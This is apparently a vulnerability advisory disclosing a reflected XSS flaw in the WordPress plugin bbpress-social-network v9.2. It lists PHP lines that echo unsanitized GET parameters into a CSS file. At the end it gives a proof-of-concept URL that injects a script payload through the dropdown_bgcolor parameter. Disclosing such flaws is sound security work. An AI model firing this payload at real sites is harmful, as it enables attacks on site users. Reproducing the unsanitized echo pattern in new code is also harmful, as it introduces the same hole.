Advisory #: 775
Title: Reflected XSS in wordpress plugin bbpress-social-network v9.2
Author: Larry W. Cashdollar, @_larry0
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/bbpress-social-network
Downloads: 3365
Vendor Notified: 2016-02-09
Export: Json
Vendor Contact: plugins@wordpress.org
Plugin Name: bbpress-social-network
Vulnerability:
There is a reflected XSS vulnerability in the following php code ./bbpress-social-network/css/ln_livenotifications_cssback.php: 145:/*-moz-box-shadow: 10px 10px 5px <?php echo $_GET['dropdown_bgcolor'];?>; 146: -webkit-box-shadow: 10px 10px 5px <?php echo $_GET['dropdown_bgcolor'];?>; 147: box-shadow: 10px 10px 5px <?php echo $_GET['dropdown_bgcolor'];?>; 290: color: <?php echo $_GET['dropdown_color'];?>; 296: color: <?php echo $_GET['dropdown_color'];?>; 302: background-color: <?php echo $_GET['banner_bgcolor']?>; 486: /*background: <?php echo $_GET['dropdown_hover_bgcolor'];?>;*/ 578: background: <?php echo $_GET['dropdown_bit_bgcolor'];?>; 579: color: <?php echo $_GET['dropdown_link_color']?>; 591: background: <?php echo $_GET['dropdown_hover_bgcolor'];?>; 597: background: <?php echo $_GET['dropdown_bit_bgcolor'];?>; 598: color: <?php echo $_GET['dropdown_link_color'];?>; 610: background: <?php echo $_GET['dropdown_hover_bgcolor'];?>; 643: background: <?php echo $_GET['dropdown_bit_bgcolor'];?>; 650: background-color: <?php echo $_GET['dropdown_bit_bgcolor'];?>; 658: background-color: <?php echo $_GET['dropdown_hover_bgcolor'];?>; 665: background-color: <?php echo $_GET['dropdown_bit_bgcolor'];?>; 698: color: <?php echo $_GET['dropdown_link_color'];?>; 702: color: <?php echo $_GET['dropdown_link_color'];?> !important; 706: color: <?php echo $_GET['dropdown_link_color'];?>; 711: color: <?php echo $_GET['dropdown_link_color'];?>; 716: color: <?php echo $_GET['dropdown_link_color'];?>; 747: color:<?php echo $_GET['dropdown_color'];?>; 755: color: <?php echo $_GET['dropdown_link_color'];?>; 765: color: <?php echo $_GET['dropdown_link_color'];?>; 799: color: <?php echo $_GET['dropdown_link_color'];?>; 806: color: <?php echo $_GET['dropdown_link_color'];?>; 828: /*background: <?php echo $_GET['dropdown_hover_bgcolor'];?> right center no-repeat;*/ 848: color: <?php echo $_GET['dropdown_link_color'];?> !important; 861: color: <?php echo $_GET['dropdown_color'];?>; 866: border-top:1px solid <?php echo $_GET['dropdown_boder_color'];?>; 867: background: <?php echo $_GET['dropdown_bit_color'];?>; 872: background: <?php echo $_GET['dropdown_hover_bgcolor'];?>; 877: border-top:1px solid <?php echo $_GET['dropdown_bit_color'];?>; 920: border-top:1px solid <?php echo $_GET['dropdown_boder_color'];?>; 921: border-bottom:1px solid <?php echo $_GET['dropdown_boder_color'];?>; 924: color: <?php echo $_GET['dropdown_color'];?>; The variable dropdown_bgcolor appears to send unsanitized data back to the users browser.
CVE-ID: Not Released
File:./bbpress-social-network/css/ln_livenotifications_cssback.php
Exploit Code:
Exploit was derived from appearance of first vulnerable parameter in code, there could be more shown above.
  1. This is an untested autogenerated exploit:
  2. http://[target]/wp-content/plugins/bbpress-social-network/css/ln_livenotifications_cssback.php?dropdown_bgcolor="><script>alert(1);</script><"